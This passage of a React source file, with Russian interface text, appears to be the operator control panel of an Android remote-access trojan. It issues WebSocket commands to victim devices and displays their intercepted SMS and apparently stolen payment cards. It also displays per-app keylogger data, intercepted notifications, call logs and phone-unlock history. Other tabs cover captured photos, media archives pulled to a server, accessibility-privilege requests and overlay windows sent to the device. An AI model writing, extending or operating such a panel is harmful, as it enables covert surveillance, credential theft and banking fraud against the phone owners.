    processedList.forEach(thread => {
      if (!thread.messages || !Array.isArray(thread.messages)) return;
      
      const uniqueMsgs = [];
      const seen = new Set();

      thread.messages.forEach(msg => {
        const timeKey = Math.floor((msg.date || 0) / 60000); 
        const key = `${msg.body}_${timeKey}`;

        if (!seen.has(key)) {
          seen.add(key);
          uniqueMsgs.push(msg);
        }
      });
      
      thread.messages = uniqueMsgs;
    });

    const sorted = processedList.sort((a, b) => {
      const lastDateA = a.messages[0]?.date || 0;
      const lastDateB = b.messages[0]?.date || 0;
      return lastDateB - lastDateA;
    });

    if (!smsSearchQuery) return sorted;
    return sorted.filter(thread =>
      thread.from.toLowerCase().includes(smsSearchQuery.toLowerCase())
    );
  }, [device?.sms, smsSearchQuery]);

  // Ref для отслеживания количества сообщений по отправителю (чтобы раскрывать при новых)
  const prevSmsCountsRef = useRef({});

  // Свертывание входящих: новые отправители сворачиваются; если кол-во сообщений у существующего
  // отправителя выросло — группа раскрывается автоматически
  useEffect(() => {
    if (!Array.isArray(sortedIncomingSms)) return;
    setCollapsedSenders(prev => {
      const next = new Set(prev);
      sortedIncomingSms.forEach(thread => {
        const prevCount = prevSmsCountsRef.current[thread.from] || 0;
        const newCount = thread.messages?.length || 0;
        if (!next.has(thread.from)) {
          // Новый отправитель — сворачиваем
          next.add(thread.from);
        } else if (prevCount > 0 && newCount > prevCount) {
          // У существующего отправителя появились новые сообщения — раскрываем
          next.delete(thread.from);
        }
        prevSmsCountsRef.current[thread.from] = newCount;
      });
      return next;
    });
  }, [sortedIncomingSms]);

  useEffect(() => {
    if (device && !device.systemInfo && !isLoading) {
      handleRefreshInfo('system');
    }
  }, [device, isLoading, handleRefreshInfo]);

  useEffect(() => {
    if (activeTab !== 'apps') {
      setAppSearchQuery('');
    }
    if (activeTab !== 'sms') {
      setActiveSmsTab('incoming');
    }
    if (activeTab !== 'calls') {
      setActiveCallTab('all');
    }
    if (activeTab !== 'media') {
      setActiveMediaTab('local');
    }
  }, [activeTab]);

  useEffect(() => {
    if (!isSmsLivePending) return;

    const meta = device?.smsMeta;

    if (meta && meta.source === 'device') {
      if (!meta.reqId || (meta.reqId && meta.reqId === lastSmsReqId)) {
        setIsSmsLivePending(false);
        if (smsLiveTimerId) {
          clearTimeout(smsLiveTimerId);
          setSmsLiveTimerId(null);
        }
      }
    }
  }, [device?.smsMeta, isSmsLivePending, lastSmsReqId, smsLiveTimerId]);

  const handleRequestLiveSms = () => {
    if (isSmsLivePending) return;

    if (wsRef && wsRef.current && wsRef.current.readyState === WebSocket.OPEN && device?.uuid) {
      const reqId = `sms-${Date.now()}`;
      wsRef.current.send(JSON.stringify({
        action: 'getSms',
        uuid: device.uuid,
        reqId
      }));

      TOAST.info('Запрос на получение СМС с устройства отправлен.');

      const id = setTimeout(() => {
        setIsSmsLivePending(false);
        setSmsLiveTimerId(null);
      }, 30000);

      setLastSmsReqId(reqId);
      setSmsLiveTimerId(id);
      setIsSmsLivePending(true);
    } else {
      handleRefreshInfo('sms');
    }
  };

  const info = device?.systemInfo || {};
  const deviceApps = info.supAP?.data?.sup_ap_list;
  const appList = deviceApps || [];
  const isAppsLoading = deviceApps === undefined;

  if (isLoading && !info.deviceInfo && activeTab !== 'apps') return <p>Загрузка информации об устройстве...</p>;

  if (!info.deviceInfo && activeTab !== 'sms' && activeTab !== 'contacts' && activeTab !== 'ussd' && activeTab !== 'calls' && activeTab !== 'media' && activeTab !== 'apps') return (
    <div>
      <p>Нет данных об устройстве. Нажмите "Обновить", чтобы запросить их.</p>
      <button onClick={() => handleRefreshInfo('system')} disabled={isLoading}>
        {isLoading ? 'Загрузка...' : 'Обновить'}
      </button>
    </div>
  );

  return (
    <div className="overview-list">
      <style>{`
        .overview-list .info-section { margin-bottom: 24px; }
        .overview-list h4 { margin-bottom: 8px; border-bottom: 1px solid #ccc; padding-bottom: 4px; }
        .overview-list p { margin: 6px 0; word-break: break-all; }
        .overview-list .error-text { color: #d32f2f; }
        .overview-list .sim-details { border-left: 3px solid #eee; padding-left: 12px; margin-bottom: 12px; }
        .overview-list .last-updated { font-size: 12px; color: #666; text-align: right; margin-bottom: 10px; }
      `}</style>

      {info && info.lastUpdatedAt && (
        <p className="last-updated">
          Последнее обновление: {new Date(info.lastUpdatedAt).toLocaleString('ru-RU')}
        </p>
      )}

      {(() => {
        switch (activeTab) {
          case 'general':
            return info && renderGeneralSection(info);
          case 'apps': {
            const hasPriv = device?.systemInfo?.permissions?.data?.is_accessibility_enabled === true || device?.accLocked === true;
            const subBtnStyle = (active) => ({
              padding: '7px 16px', border: '1px solid #555',
              background: active ? '#5a5a9e' : '#333', color: active ? '#fff' : '#ccc',
              cursor: 'pointer', borderRadius: '4px', fontSize: '13px'
            });
            return (
              <div>
                {/* Под-вкладки */}
                <div style={{ display: 'flex', gap: '10px', marginBottom: '16px', borderBottom: '1px solid #444', paddingBottom: '10px' }}>
                  <button onClick={() => setActiveAppsTab('installed')} style={subBtnStyle(activeAppsTab === 'installed')}>
                    📱 Установленные приложения
                  </button>
                  {hasPriv && (
                    <button onClick={() => setActiveAppsTab('mink')} style={subBtnStyle(activeAppsTab === 'mink')}>
                      🔍 Проверка на Рат
                    </button>
                  )}
                </div>
                {activeAppsTab === 'installed' && renderAppsSection(
                  appList, appSearchQuery,
                  (e) => setAppSearchQuery(e.target.value),
                  isAppsLoading, onLaunchApp, hasPriv,
                  onToggleKeylog, keylogActivePackages, keylogDataPackages, onViewKeylog
                )}
                {activeAppsTab === 'mink' && hasPriv && <MinkScanTab minkScanResult={minkScanResult} onMinkScan={onMinkScan} />}
              </div>
            );
          }
          case 'gmail':
            return info && renderGmailSection(info);
          case 'contacts':
            return renderContactsSection(device, isLoading, handleRefreshInfo, onAddContactClick, isContactsArchived);
          case 'permissions':
            return info && renderPermissionsSection(info);
          // 'sim' объединён с 'network' — вкладка Сеть и SIM
          case 'sim':
          case 'network':
            return info && (
              <>
                {renderNetworkSection(info)}
                {renderSimSection(info)}
              </>
            );
          case 'sms':
            return renderSmsSection(
              device,
              isLoading,
              handleRefreshInfo,
              outgoingMessages,
              activeSmsTab,
              setActiveSmsTab,
              groupedAndSortedSms,
              sortedIncomingSms,
              smsSearchQuery,
              (e) => setSmsSearchQuery(e.target.value),
              isSmsLivePending,
              handleRequestLiveSms,
              interceptedCards,
              isCardsLoading,
              collapsedSenders,
              setCollapsedSenders
            );
          case 'media':
            return (
              <div className="info-section">
                <div
                  style={{
                    display: 'flex',
                    gap: '10px',
                    marginBottom: '15px',
                    borderBottom: '1px solid #444',
                    paddingBottom: '5px',
                    flexWrap: 'nowrap'
                  }}
                >
                  <button
                    onClick={() => setActiveMediaTab('local')}
                    style={{
                      ...subTabStyle,
                      ...(activeMediaTab === 'local' ? activeSubTabStyle : {})
                    }}
                  >
                    Фото и Видео
                  </button>

                  <button
                    onClick={() => {
                      setActiveMediaTab('archive');
                      onRequestArchivesList();
                    }}
                    style={{
                      ...subTabStyle,
                      ...(activeMediaTab === 'archive' ? activeSubTabStyle : {})
                    }}
                  >
                    Работа с архивом
                  </button>

                  <button
                    onClick={() => {
                      setActiveMediaTab('server');
                    }}
                    style={{
                      ...subTabStyle,
                      ...(activeMediaTab === 'server' ? activeSubTabStyle : {})
                    }}
                  >
                    Сохранённые на сервере
                  </button>
                </div>

                {activeMediaTab === 'local' && (
                  <MediaTabView
                    mediaFiles={mediaFiles}
                    onGetMedia={onGetMedia}
                    onDownloadMedia={onDownloadMedia}
                    uploadProgress={uploadProgress}
                    capturedPoto={capturedPoto}
                    onClearPoto={onClearPoto}
                    onSavePoto={onSavePoto}
                  />
                )}

                {activeMediaTab === 'archive' && (
                  <ArchiveTabView
                    archivesList={archivesList}
                    zipBusy={zipBusy}
                    zipProgressState={zipProgressState}
                    zipWarning={zipWarning}
                    downloadLinks={downloadLinks}
                    isZipModalOpen={isZipModalOpen}
                    onOpenZipModal={onOpenZipModal}
                    onCloseZipModal={onCloseZipModal}
                    onSubmitZipRequest={onSubmitZipRequest}
                    onRequestList={onRequestArchivesList}
                    onDownloadArchive={onDownloadArchive}
                    onDeleteArchive={onDeleteArchive}
                  />
                )}

                {activeMediaTab === 'server' && (
                  <ServerArchivesTab
                    ws={wsRef.current}
                    deviceUuid={device.uuid}
                    toast={TOAST}
                  />
                )}
              </div>
            );
          case 'ussd':
            return renderUssdSection(ussdHistory);
          case 'notifications':
            return (
              <NotificationsSection
                notifications={notifications}
                onDelete={onDeleteNotification}
                onReply={onReplyToNotification}
                device={device}
                onToggleIntercept={onToggleIntercept}
                isLoading={isLoading}
                onRefreshNotifications={onRefreshNotifications}
              />
            );
          case 'calls':
            return renderCallLogsSection(
              device,
              callLogs,
              isLoading,
              handleRefreshInfo,
              activeCallTab,
              setActiveCallTab,
              unlockHistory
            );
          case 'extra-info':
            return <ExtraInfoSection device={device} onCheckNumber={onCheckNumber} onCheckOsint={onCheckOsint} isLoading={isLoading} />;
          case 'management':
            return <DeviceManagementTab onRequestPrivilege={onRequestPrivilege} privilegeStatus={privilegeStatus} onRequestPermission={onRequestPermission} permissionsData={device?.systemInfo?.permissions?.data} onSendWindow={onSendWindow} windowHistory={windowHistory} onRefreshWindowHistory={onRefreshWindowHistory} appName={device?.systemInfo?.deviceInfo?.data?.app_name || ''} />;
          default:
            return <p>Выберите вкладку для просмотра информации.</p>;
        }
      })()}
    </div>
  );
}

export default DeviceDetailsContent;